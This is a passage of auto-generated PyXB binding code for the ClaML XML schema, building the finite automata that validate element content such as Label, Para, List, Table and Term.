transitions.append(fac.Transition(st_4, [
fac.UpdateInstruction(cc_4, True) ]))
transitions.append(fac.Transition(st_5, [
fac.UpdateInstruction(cc_4, False) ]))
transitions.append(fac.Transition(st_6, [
fac.UpdateInstruction(cc_4, False) ]))
st_4._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_5, [
fac.UpdateInstruction(cc_5, True) ]))
transitions.append(fac.Transition(st_6, [
fac.UpdateInstruction(cc_5, False) ]))
st_5._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_6, [
fac.UpdateInstruction(cc_6, True) ]))
st_6._set_transitionSet(transitions)
return fac.Automaton(states, counters, True, containing_state=None)
CTD_ANON_16._Automaton = _BuildAutomaton_13()
CTD_ANON_19._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'Label'), CTD_ANON_20, scope=CTD_ANON_19, location=pyxb.utils.utility.Location('ClaML.xsd', 228, 4)))
CTD_ANON_19._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'History'), CTD_ANON_21, scope=CTD_ANON_19, location=pyxb.utils.utility.Location('ClaML.xsd', 236, 4)))
def _BuildAutomaton_14 ():
# Remove this helper function from the namespace after it is invoked
global _BuildAutomaton_14
del _BuildAutomaton_14
import pyxb.utils.fac as fac
counters = set()
cc_0 = fac.CounterCondition(min=0, max=None, metadata=pyxb.utils.utility.Location('ClaML.xsd', 221, 16))
counters.add(cc_0)
states = []
final_update = set()
symbol = pyxb.binding.content.ElementUse(CTD_ANON_19._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'Label')), pyxb.utils.utility.Location('ClaML.xsd', 220, 16))
st_0 = fac.State(symbol, is_initial=True, final_update=final_update, is_unordered_catenation=False)
states.append(st_0)
final_update = set()
final_update.add(fac.UpdateInstruction(cc_0, False))
symbol = pyxb.binding.content.ElementUse(CTD_ANON_19._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'History')), pyxb.utils.utility.Location('ClaML.xsd', 221, 16))
st_1 = fac.State(symbol, is_initial=False, final_update=final_update, is_unordered_catenation=False)
states.append(st_1)
transitions = []
transitions.append(fac.Transition(st_0, [
]))
transitions.append(fac.Transition(st_1, [
]))
st_0._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_1, [
fac.UpdateInstruction(cc_0, True) ]))
st_1._set_transitionSet(transitions)
return fac.Automaton(states, counters, False, containing_state=None)
CTD_ANON_19._Automaton = _BuildAutomaton_14()
CTD_ANON_20._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'Reference'), CTD_ANON_24, scope=CTD_ANON_20, location=pyxb.utils.utility.Location('ClaML.xsd', 254, 4)))
CTD_ANON_20._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'Para'), CTD_ANON_25, scope=CTD_ANON_20, location=pyxb.utils.utility.Location('ClaML.xsd', 264, 4)))
CTD_ANON_20._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'Fragment'), CTD_ANON_40, scope=CTD_ANON_20, location=pyxb.utils.utility.Location('ClaML.xsd', 270, 4)))
CTD_ANON_20._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'Include'), CTD_ANON_26, scope=CTD_ANON_20, location=pyxb.utils.utility.Location('ClaML.xsd', 285, 4)))
CTD_ANON_20._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'IncludeDescendants'), CTD_ANON_27, scope=CTD_ANON_20, location=pyxb.utils.utility.Location('ClaML.xsd', 291, 4)))
CTD_ANON_20._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'List'), CTD_ANON_28, scope=CTD_ANON_20, location=pyxb.utils.utility.Location('ClaML.xsd', 297, 4)))
CTD_ANON_20._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'Table'), CTD_ANON_30, scope=CTD_ANON_20, location=pyxb.utils.utility.Location('ClaML.xsd', 317, 4)))
CTD_ANON_20._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'Term'), CTD_ANON_37, scope=CTD_ANON_20, location=pyxb.utils.utility.Location('ClaML.xsd', 380, 4)))
def _BuildAutomaton_15 ():
# Remove this helper function from the namespace after it is invoked
global _BuildAutomaton_15
del _BuildAutomaton_15
import pyxb.utils.fac as fac
counters = set()
cc_0 = fac.CounterCondition(min=0, max=None, metadata=pyxb.utils.utility.Location('ClaML.xsd', 230, 12))
counters.add(cc_0)
cc_1 = fac.CounterCondition(min=0, max=1, metadata=pyxb.utils.utility.Location('ClaML.xsd', 6, 12))
counters.add(cc_1)
states = []
final_update = set()
final_update.add(fac.UpdateInstruction(cc_0, False))
final_update.add(fac.UpdateInstruction(cc_1, False))
symbol = pyxb.binding.content.ElementUse(CTD_ANON_20._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'Reference')), pyxb.utils.utility.Location('ClaML.xsd', 7, 16))
st_0 = fac.State(symbol, is_initial=True, final_update=final_update, is_unordered_catenation=False)
states.append(st_0)
final_update = set()
final_update.add(fac.UpdateInstruction(cc_0, False))
final_update.add(fac.UpdateInstruction(cc_1, False))
symbol = pyxb.binding.content.ElementUse(CTD_ANON_20._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'Term')), pyxb.utils.utility.Location('ClaML.xsd', 8, 16))
st_1 = fac.State(symbol, is_initial=True, final_update=final_update, is_unordered_catenation=False)
states.append(st_1)
final_update = set()
final_update.add(fac.UpdateInstruction(cc_0, False))
symbol = pyxb.binding.content.ElementUse(CTD_ANON_20._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'Para')), pyxb.utils.utility.Location('ClaML.xsd', 15, 12))
st_2 = fac.State(symbol, is_initial=True, final_update=final_update, is_unordered_catenation=False)
states.append(st_2)
final_update = set()
final_update.add(fac.UpdateInstruction(cc_0, False))
symbol = pyxb.binding.content.ElementUse(CTD_ANON_20._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'Include')), pyxb.utils.utility.Location('ClaML.xsd', 16, 12))
st_3 = fac.State(symbol, is_initial=True, final_update=final_update, is_unordered_catenation=False)
states.append(st_3)
final_update = set()
final_update.add(fac.UpdateInstruction(cc_0, False))
symbol = pyxb.binding.content.ElementUse(CTD_ANON_20._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'IncludeDescendants')), pyxb.utils.utility.Location('ClaML.xsd', 17, 12))
st_4 = fac.State(symbol, is_initial=True, final_update=final_update, is_unordered_catenation=False)
states.append(st_4)
final_update = set()
final_update.add(fac.UpdateInstruction(cc_0, False))
symbol = pyxb.binding.content.ElementUse(CTD_ANON_20._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'Fragment')), pyxb.utils.utility.Location('ClaML.xsd', 18, 12))
st_5 = fac.State(symbol, is_initial=True, final_update=final_update, is_unordered_catenation=False)
states.append(st_5)
final_update = set()
final_update.add(fac.UpdateInstruction(cc_0, False))
symbol = pyxb.binding.content.ElementUse(CTD_ANON_20._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'List')), pyxb.utils.utility.Location('ClaML.xsd', 19, 12))
st_6 = fac.State(symbol, is_initial=True, final_update=final_update, is_unordered_catenation=False)
states.append(st_6)
final_update = set()
final_update.add(fac.UpdateInstruction(cc_0, False))
symbol = pyxb.binding.content.ElementUse(CTD_ANON_20._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'Table')), pyxb.utils.utility.Location('ClaML.xsd', 20, 12))
st_7 = fac.State(symbol, is_initial=True, final_update=final_update, is_unordered_catenation=False)
states.append(st_7)
transitions = []
transitions.append(fac.Transition(st_0, [
fac.UpdateInstruction(cc_0, True),
fac.UpdateInstruction(cc_1, False) ]))
transitions.append(fac.Transition(st_0, [
fac.UpdateInstruction(cc_1, True) ]))
transitions.append(fac.Transition(st_1, [
fac.UpdateInstruction(cc_0, True),
fac.UpdateInstruction(cc_1, False) ]))
transitions.append(fac.Transition(st_1, [
fac.UpdateInstruction(cc_1, True) ]))
transitions.append(fac.Transition(st_2, [
fac.UpdateInstruction(cc_0, True),
fac.UpdateInstruction(cc_1, False) ]))
transitions.append(fac.Transition(st_3, [
fac.UpdateInstruction(cc_0, True),
fac.UpdateInstruction(cc_1, False) ]))
transitions.append(fac.Transition(st_4, [
fac.UpdateInstruction(cc_0, True),
fac.UpdateInstruction(cc_1, False) ]))
transitions.append(fac.Transition(st_5, [
fac.UpdateInstruction(cc_0, True),
fac.UpdateInstruction(cc_1, False) ]))
transitions.append(fac.Transition(st_6, [
fac.UpdateInstruction(cc_0, True),
fac.UpdateInstruction(cc_1, False) ]))
transitions.append(fac.Transition(st_7, [
fac.UpdateInstruction(cc_0, True),
fac.UpdateInstruction(cc_1, False) ]))
st_0._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_0, [
fac.UpdateInstruction(cc_0, True),
fac.UpdateInstruction(cc_1, False) ]))
transitions.append(fac.Transition(st_0, [
fac.UpdateInstruction(cc_1, True) ]))
transitions.append(fac.Transition(st_1, [
fac.UpdateInstruction(cc_0, True),
fac.UpdateInstruction(cc_1, False) ]))
transitions.append(fac.Transition(st_1, [
fac.UpdateInstruction(cc_1, True) ]))
transitions.append(fac.Transition(st_2, [
fac.UpdateInstruction(cc_0, True),
fac.UpdateInstruction(cc_1, False) ]))
transitions.append(fac.Transition(st_3, [
fac.UpdateInstruction(cc_0, True),
fac.UpdateInstruction(cc_1, False) ]))
transitions.append(fac.Transition(st_4, [
fac.UpdateInstruction(cc_0, True),
fac.UpdateInstruction(cc_1, False) ]))
transitions.append(fac.Transition(st_5, [
fac.UpdateInstruction(cc_0, True),
fac.UpdateInstruction(cc_1, False) ]))
transitions.append(fac.Transition(st_6, [
fac.UpdateInstruction(cc_0, True),
fac.UpdateInstruction(cc_1, False) ]))
transitions.append(fac.Transition(st_7, [
fac.UpdateInstruction(cc_0, True),
fac.UpdateInstruction(cc_1, False) ]))
st_1._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_0, [
fac.UpdateInstruction(cc_0, True) ]))
transitions.append(fac.Transition(st_1, [
fac.UpdateInstruction(cc_0, True) ]))
transitions.append(fac.Transition(st_2, [
fac.UpdateInstruction(cc_0, True) ]))
transitions.append(fac.Transition(st_3, [
fac.UpdateInstruction(cc_0, True) ]))
transitions.append(fac.Transition(st_4, [
fac.UpdateInstruction(cc_0, True) ]))
transitions.append(fac.Transition(st_5, [
fac.UpdateInstruction(cc_0, True) ]))
transitions.append(fac.Transition(st_6, [
fac.UpdateInstruction(cc_0, True) ]))
transitions.append(fac.Transition(st_7, [
fac.UpdateInstruction(cc_0, True) ]))
st_2._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_0, [
fac.UpdateInstruction(cc_0, True) ]))
transitions.append(fac.Transition(st_1, [
fac.UpdateInstruction(cc_0, True) ]))
transitions.append(fac.Transition(st_2, [
fac.UpdateInstruction(cc_0, True) ]))
transitions.append(fac.Transition(st_3, [
fac.UpdateInstruction(cc_0, True) ]))
transitions.append(fac.Transition(st_4, [
fac.UpdateInstruction(cc_0, True) ]))
transitions.append(fac.Transition(st_5, [
fac.UpdateInstruction(cc_0, True) ]))
transitions.append(fac.Transition(st_6, [
fac.UpdateInstruction(cc_0, True) ]))
transitions.append(fac.Transition(st_7, [
fac.UpdateInstruction(cc_0, True) ]))
st_3._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_0, [
fac.UpdateInstruction(cc_0, True) ]))
transitions.append(fac.Transition(st_1, [
fac.UpdateInstruction(cc_0, True) ]))
transitions.append(fac.Transition(st_2, [
fac.UpdateInstruction(cc_0, True) ]))
transitions.append(fac.Transition(st_3, [
fac.UpdateInstruction(cc_0, True) ]))
transitions.append(fac.Transition(st_4, [
fac.UpdateInstruction(cc_0, True) ]))
transitions.append(fac.Transition(st_5, [
fac.UpdateInstruction(cc_0, True) ]))
transitions.append(fac.Transition(st_6, [
fac.UpdateInstruction(cc_0, True) ]))
transitions.append(fac.Transition(st_7, [
fac.UpdateInstruction(cc_0, True) ]))
st_4._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_0, [
fac.UpdateInstruction(cc_0, True) ]))
transitions.append(fac.Transition(st_1, [
fac.UpdateInstruction(cc_0, True) ]))
transitions.append(fac.Transition(st_2, [
fac.UpdateInstruction(cc_0, True) ]))
transitions.append(fac.Transition(st_3, [
fac.UpdateInstruction(cc_0, True) ]))
transitions.append(fac.Transition(st_4, [
fac.UpdateInstruction(cc_0, True) ]))
transitions.append(fac.Transition(st_5, [
fac.UpdateInstruction(cc_0, True) ]))
transitions.append(fac.Transition(st_6, [
fac.UpdateInstruction(cc_0, True) ]))
transitions.append(fac.Transition(st_7, [
fac.UpdateInstruction(cc_0, True) ]))
st_5._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_0, [
fac.UpdateInstruction(cc_0, True) ]))
transitions.append(fac.Transition(st_1, [
fac.UpdateInstruction(cc_0, True) ]))
transitions.append(fac.Transition(st_2, [
fac.UpdateInstruction(cc_0, True) ]))
transitions.append(fac.Transition(st_3, [
fac.UpdateInstruction(cc_0, True) ]))
transitions.append(fac.Transition(st_4, [
fac.UpdateInstruction(cc_0, True) ]))
transitions.append(fac.Transition(st_5, [
fac.UpdateInstruction(cc_0, True) ]))
transitions.append(fac.Transition(st_6, [
fac.UpdateInstruction(cc_0, True) ]))
transitions.append(fac.Transition(st_7, [
fac.UpdateInstruction(cc_0, True) ]))
st_6._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_0, [
fac.UpdateInstruction(cc_0, True) ]))
transitions.append(fac.Transition(st_1, [
fac.UpdateInstruction(cc_0, True) ]))
transitions.append(fac.Transition(st_2, [
fac.UpdateInstruction(cc_0, True) ]))
transitions.append(fac.Transition(st_3, [
fac.UpdateInstruction(cc_0, True) ]))
transitions.append(fac.Transition(st_4, [
fac.UpdateInstruction(cc_0, True) ]))
transitions.append(fac.Transition(st_5, [
fac.UpdateInstruction(cc_0, True) ]))
transitions.append(fac.Transition(st_6, [
fac.UpdateInstruction(cc_0, True) ]))
transitions.append(fac.Transition(st_7, [
fac.UpdateInstruction(cc_0, True) ]))
st_7._set_transitionSet(transitions)
return fac.Automaton(states, counters, True, containing_state=None)
CTD_ANON_20._Automaton = _BuildAutomaton_15()
def _BuildAutomaton_16 ():
# Remove this helper function from the namespace after it is invoked
global _BuildAutomaton_16
del _BuildAutomaton_16
import pyxb.utils.fac as fac
counters = set()
states = []
return fac.Automaton(states, counters, True, containing_state=None)
CTD_ANON_21._Automaton = _BuildAutomaton_16()
def _BuildAutomaton_17 ():
# Remove this helper function from the namespace after it is invoked
global _BuildAutomaton_17
del _BuildAutomaton_17
import pyxb.utils.fac as fac
counters = set()
states = []
return fac.Automaton(states, counters, True, containing_state=None)
CTD_ANON_24._Automaton = _BuildAutomaton_17()
CTD_ANON_25._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'Reference'), CTD_ANON_24, scope=CTD_ANON_25, location=pyxb.utils.utility.Location('ClaML.xsd', 254, 4)))
CTD_ANON_25._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'Term'), CTD_ANON_37, scope=CTD_ANON_25, location=pyxb.utils.utility.Location('ClaML.xsd', 380, 4)))
def _BuildAutomaton_18 ():
# Remove this helper function from the namespace after it is invoked
global _BuildAutomaton_18
del _BuildAutomaton_18
import pyxb.utils.fac as fac
counters = set()
cc_0 = fac.CounterCondition(min=0, max=None, metadata=pyxb.utils.utility.Location('ClaML.xsd', 266, 12))
counters.add(cc_0)
cc_1 = fac.CounterCondition(min=0, max=1, metadata=pyxb.utils.utility.Location('ClaML.xsd', 6, 12))
counters.add(cc_1)
states = []
final_update = set()
final_update.add(fac.UpdateInstruction(cc_0, False))
final_update.add(fac.UpdateInstruction(cc_1, False))
symbol = pyxb.binding.content.ElementUse(CTD_ANON_25._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'Reference')), pyxb.utils.utility.Location('ClaML.xsd', 7, 16))
st_0 = fac.State(symbol, is_initial=True, final_update=final_update, is_unordered_catenation=False)
states.append(st_0)
final_update = set()
final_update.add(fac.UpdateInstruction(cc_0, False))
final_update.add(fac.UpdateInstruction(cc_1, False))
symbol = pyxb.binding.content.ElementUse(CTD_ANON_25._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'Term')), pyxb.utils.utility.Location('ClaML.xsd', 8, 16))
st_1 = fac.State(symbol, is_initial=True, final_update=final_update, is_unordered_catenation=False)
states.append(st_1)
transitions = []
transitions.append(fac.Transition(st_0, [
fac.UpdateInstruction(cc_0, True),
fac.UpdateInstruction(cc_1, False) ]))
transitions.append(fac.Transition(st_0, [
fac.UpdateInstruction(cc_1, True) ]))
transitions.append(fac.Transition(st_1, [
fac.UpdateInstruction(cc_0, True),
fac.UpdateInstruction(cc_1, False) ]))
transitions.append(fac.Transition(st_1, [
fac.UpdateInstruction(cc_1, True) ]))
st_0._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_0, [
fac.UpdateInstruction(cc_0, True),
fac.UpdateInstruction(cc_1, False) ]))
transitions.append(fac.Transition(st_0, [
fac.UpdateInstruction(cc_1, True) ]))
transitions.append(fac.Transition(st_1, [
fac.UpdateInstruction(cc_0, True),
fac.UpdateInstruction(cc_1, False) ]))
transitions.append(fac.Transition(st_1, [
fac.UpdateInstruction(cc_1, True) ]))
st_1._set_transitionSet(transitions)
return fac.Automaton(states, counters, True, containing_state=None)
CTD_ANON_25._Automaton = _BuildAutomaton_18()
CTD_ANON_28._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'ListItem'), CTD_ANON_29, scope=CTD_ANON_28, location=pyxb.utils.utility.Location('ClaML.xsd', 305, 4)))
def _BuildAutomaton_19 ():
# Remove this helper function from the namespace after it is invoked
global _BuildAutomaton_19
del _BuildAutomaton_19
import pyxb.utils.fac as fac
counters = set()
states = []
final_update = set()
symbol = pyxb.binding.content.ElementUse(CTD_ANON_28._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'ListItem')), pyxb.utils.utility.Location('ClaML.xsd', 300, 16))
st_0 = fac.State(symbol, is_initial=True, final_update=final_update, is_unordered_catenation=False)
states.append(st_0)
transitions = []
transitions.append(fac.Transition(st_0, [
]))
st_0._set_transitionSet(transitions)
return fac.Automaton(states, counters, False, containing_state=None)
CTD_ANON_28._Automaton = _BuildAutomaton_19()
CTD_ANON_29._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'Reference'), CTD_ANON_24, scope=CTD_ANON_29, location=pyxb.utils.utility.Location('ClaML.xsd', 254, 4)))
CTD_ANON_29._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'Para'), CTD_ANON_25, scope=CTD_ANON_29, location=pyxb.utils.utility.Location('ClaML.xsd', 264, 4)))
CTD_ANON_29._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'Include'), CTD_ANON_26, scope=CTD_ANON_29, location=pyxb.utils.utility.Location('ClaML.xsd', 285, 4)))
CTD_ANON_29._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'List'), CTD_ANON_28, scope=CTD_ANON_29, location=pyxb.utils.utility.Location('ClaML.xsd', 297, 4)))
CTD_ANON_29._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'Table'), CTD_ANON_30, scope=CTD_ANON_29, location=pyxb.utils.utility.Location('ClaML.xsd', 317, 4)))
CTD_ANON_29._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'Term'), CTD_ANON_37, scope=CTD_ANON_29, location=pyxb.utils.utility.Location('ClaML.xsd', 380, 4)))
def _BuildAutomaton_20 ():
# Remove this helper function from the namespace after it is invoked
global _BuildAutomaton_20
del _BuildAutomaton_20
import pyxb.utils.fac as fac
counters = set()
cc_0 = fac.CounterCondition(min=0, max=None, metadata=pyxb.utils.utility.Location('ClaML.xsd', 307, 12))
counters.add(cc_0)
cc_1 = fac.CounterCondition(min=0, max=1, metadata=pyxb.utils.utility.Location('ClaML.xsd', 6, 12))
counters.add(cc_1)
states = []
final_update = set()
final_update.add(fac.UpdateInstruction(cc_0, False))
final_update.add(fac.UpdateInstruction(cc_1, False))
symbol = pyxb.binding.content.ElementUse(CTD_ANON_29._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'Reference')), pyxb.utils.utility.Location('ClaML.xsd', 7, 16))
st_0 = fac.State(symbol, is_initial=True, final_update=final_update, is_unordered_catenation=False)
states.append(st_0)
final_update = set()
final_update.add(fac.UpdateInstruction(cc_0, False))
final_update.add(fac.UpdateInstruction(cc_1, False))
symbol = pyxb.binding.content.ElementUse(CTD_ANON_29._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'Term')), pyxb.utils.utility.Location('ClaML.xsd', 8, 16))
st_1 = fac.State(symbol, is_initial=True, final_update=final_update, is_unordered_catenation=False)
states.append(st_1)
final_update = set()
final_update.add(fac.UpdateInstruction(cc_0, False))
symbol = pyxb.binding.content.ElementUse(CTD_ANON_29._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'Para')), pyxb.utils.utility.Location('ClaML.xsd', 309, 16))
st_2 = fac.State(symbol, is_initial=True, final_update=final_update, is_unordered_catenation=False)
states.append(st_2)
final_update = set()
final_update.add(fac.UpdateInstruction(cc_0, False))
symbol = pyxb.binding.content.ElementUse(CTD_ANON_29._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'Include')), pyxb.utils.utility.Location('ClaML.xsd', 310, 16))
st_3 = fac.State(symbol, is_initial=True, final_update=final_update, is_unordered_catenation=False)
states.append(st_3)
final_update = set()
final_update.add(fac.UpdateInstruction(cc_0, False))
symbol = pyxb.binding.content.ElementUse(CTD_ANON_29._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'List')), pyxb.utils.utility.Location('ClaML.xsd', 311, 16))
st_4 = fac.State(symbol, is_initial=True, final_update=final_update, is_unordered_catenation=False)
states.append(st_4)
final_update = set()
final_update.add(fac.UpdateInstruction(cc_0, False))
symbol = pyxb.binding.content.ElementUse(CTD_ANON_29._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'Table')), pyxb.utils.utility.Location('ClaML.xsd', 312, 16))
st_5 = fac.State(symbol, is_initial=True, final_update=final_update, is_unordered_catenation=False)
states.append(st_5)
transitions = []
transitions.append(fac.Transition(st_0, [
fac.UpdateInstruction(cc_0, True),
fac.UpdateInstruction(cc_1, False) ]))
transitions.append(fac.Transition(st_0, [
fac.UpdateInstruction(cc_1, True) ]))
transitions.append(fac.Transition(st_1, [
fac.UpdateInstruction(cc_0, True),
fac.UpdateInstruction(cc_1, False) ]))
transitions.append(fac.Transition(st_1, [
fac.UpdateInstruction(cc_1, True) ]))
transitions.append(fac.Transition(st_2, [
fac.UpdateInstruction(cc_0, True),
fac.UpdateInstruction(cc_1, False) ]))
transitions.append(fac.Transition(st_3, [
fac.UpdateInstruction(cc_0, True),
fac.UpdateInstruction(cc_1, False) ]))
transitions.append(fac.Transition(st_4, [
fac.UpdateInstruction(cc_0, True),
fac.UpdateInstruction(cc_1, False) ]))
transitions.append(fac.Transition(st_5, [
fac.UpdateInstruction(cc_0, True),
fac.UpdateInstruction(cc_1, False) ]))
st_0._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_0, [
fac.UpdateInstruction(cc_0, True),
fac.UpdateInstruction(cc_1, False) ]))
transitions.append(fac.Transition(st_0, [
fac.UpdateInstruction(cc_1, True) ]))
transitions.append(fac.Transition(st_1, [
fac.UpdateInstruction(cc_0, True),
fac.UpdateInstruction(cc_1, False) ]))
transitions.append(fac.Transition(st_1, [
fac.UpdateInstruction(cc_1, True) ]))
transitions.append(fac.Transition(st_2, [
fac.UpdateInstruction(cc_0, True),
fac.UpdateInstruction(cc_1, False) ]))
transitions.append(fac.Transition(st_3, [
fac.UpdateInstruction(cc_0, True),
fac.UpdateInstruction(cc_1, False) ]))
transitions.append(fac.Transition(st_4, [
fac.UpdateInstruction(cc_0, True),
fac.UpdateInstruction(cc_1, False) ]))
transitions.append(fac.Transition(st_5, [
fac.UpdateInstruction(cc_0, True),
fac.UpdateInstruction(cc_1, False) ]))
st_1._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_0, [
fac.UpdateInstruction(cc_0, True) ]))
transitions.append(fac.Transition(st_1, [
fac.UpdateInstruction(cc_0, True) ]))
transitions.append(fac.Transition(st_2, [
fac.UpdateInstruction(cc_0, True) ]))
transitions.append(fac.Transition(st_3, [
fac.UpdateInstruction(cc_0, True) ]))
transitions.append(fac.Transition(st_4, [
fac.UpdateInstruction(cc_0, True) ]))
transitions.append(fac.Transition(st_5, [
fac.UpdateInstruction(cc_0, True) ]))
st_2._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_0, [
fac.UpdateInstruction(cc_0, True) ]))
transitions.append(fac.Transition(st_1, [
fac.UpdateInstruction(cc_0, True) ]))
transitions.append(fac.Transition(st_2, [
fac.UpdateInstruction(cc_0, True) ]))
transitions.append(fac.Transition(st_3, [
fac.UpdateInstruction(cc_0, True) ]))
transitions.append(fac.Transition(st_4, [
fac.UpdateInstruction(cc_0, True) ]))
transitions.append(fac.Transition(st_5, [
fac.UpdateInstruction(cc_0, True) ]))
st_3._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_0, [
fac.UpdateInstruction(cc_0, True) ]))
transitions.append(fac.Transition(st_1, [
fac.UpdateInstruction(cc_0, True) ]))
transitions.append(fac.Transition(st_2, [
fac.UpdateInstruction(cc_0, True) ]))
transitions.append(fac.Transition(st_3, [
fac.UpdateInstruction(cc_0, True) ]))
transitions.append(fac.Transition(st_4, [
fac.UpdateInstruction(cc_0, True) ]))
transitions.append(fac.Transition(st_5, [
fac.UpdateInstruction(cc_0, True) ]))
st_4._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_0, [
fac.UpdateInstruction(cc_0, True) ]))
transitions.append(fac.Transition(st_1, [
fac.UpdateInstruction(cc_0, True) ]))
transitions.append(fac.Transition(st_2, [
fac.UpdateInstruction(cc_0, True) ]))
transitions.append(fac.Transition(st_3, [
fac.UpdateInstruction(cc_0, True) ]))
transitions.append(fac.Transition(st_4, [
fac.UpdateInstruction(cc_0, True) ]))
transitions.append(fac.Transition(st_5, [
fac.UpdateInstruction(cc_0, True) ]))
st_5._set_transitionSet(transitions)
return fac.Automaton(states, counters, True, containing_state=None)
CTD_ANON_29._Automaton = _BuildAutomaton_20()
CTD_ANON_30._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'Caption'), CTD_ANON_31, scope=CTD_ANON_30, location=pyxb.utils.utility.Location('ClaML.xsd', 328, 4)))
CTD_ANON_30._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'THead'), CTD_ANON_32, scope=CTD_ANON_30, location=pyxb.utils.utility.Location('ClaML.xsd', 334, 4)))
CTD_ANON_30._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'TBody'), CTD_ANON_33, scope=CTD_ANON_30, location=pyxb.utils.utility.Location('ClaML.xsd', 342, 4)))
CTD_ANON_30._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'TFoot'), CTD_ANON_34, scope=CTD_ANON_30, location=pyxb.utils.utility.Location('ClaML.xsd', 350, 4)))
def _BuildAutomaton_21 ():
# Remove this helper function from the namespace after it is invoked
global _BuildAutomaton_21
del _BuildAutomaton_21
import pyxb.utils.fac as fac
counters = set()
cc_0 = fac.CounterCondition(min=0, max=1, metadata=pyxb.utils.utility.Location('ClaML.xsd', 320, 16))
counters.add(cc_0)
cc_1 = fac.CounterCondition(min=0, max=1, metadata=pyxb.utils.utility.Location('ClaML.xsd', 321, 16))
counters.add(cc_1)
cc_2 = fac.CounterCondition(min=0, max=1, metadata=pyxb.utils.utility.Location('ClaML.xsd', 322, 16))
counters.add(cc_2)
cc_3 = fac.CounterCondition(min=0, max=1, metadata=pyxb.utils.utility.Location('ClaML.xsd', 323, 16))
counters.add(cc_3)
states = []
final_update = set()
final_update.add(fac.UpdateInstruction(cc_0, False))
symbol = pyxb.binding.content.ElementUse(CTD_ANON_30._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'Caption')), pyxb.utils.utility.Location('ClaML.xsd', 320, 16))
st_0 = fac.State(symbol, is_initial=True, final_update=final_update, is_unordered_catenation=False)
states.append(st_0)
final_update = set()
final_update.add(fac.UpdateInstruction(cc_1, False))
symbol = pyxb.binding.content.ElementUse(CTD_ANON_30._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'THead')), pyxb.utils.utility.Location('ClaML.xsd', 321, 16))
st_1 = fac.State(symbol, is_initial=True, final_update=final_update, is_unordered_catenation=False)
states.append(st_1)
final_update = set()
final_update.add(fac.UpdateInstruction(cc_2, False))
symbol = pyxb.binding.content.ElementUse(CTD_ANON_30._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'TBody')), pyxb.utils.utility.Location('ClaML.xsd', 322, 16))
st_2 = fac.State(symbol, is_initial=True, final_update=final_update, is_unordered_catenation=False)
states.append(st_2)
final_update = set()
final_update.add(fac.UpdateInstruction(cc_3, False))
symbol = pyxb.binding.content.ElementUse(CTD_ANON_30._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'TFoot')), pyxb.utils.utility.Location('ClaML.xsd', 323, 16))
st_3 = fac.State(symbol, is_initial=True, final_update=final_update, is_unordered_catenation=False)
states.append(st_3)
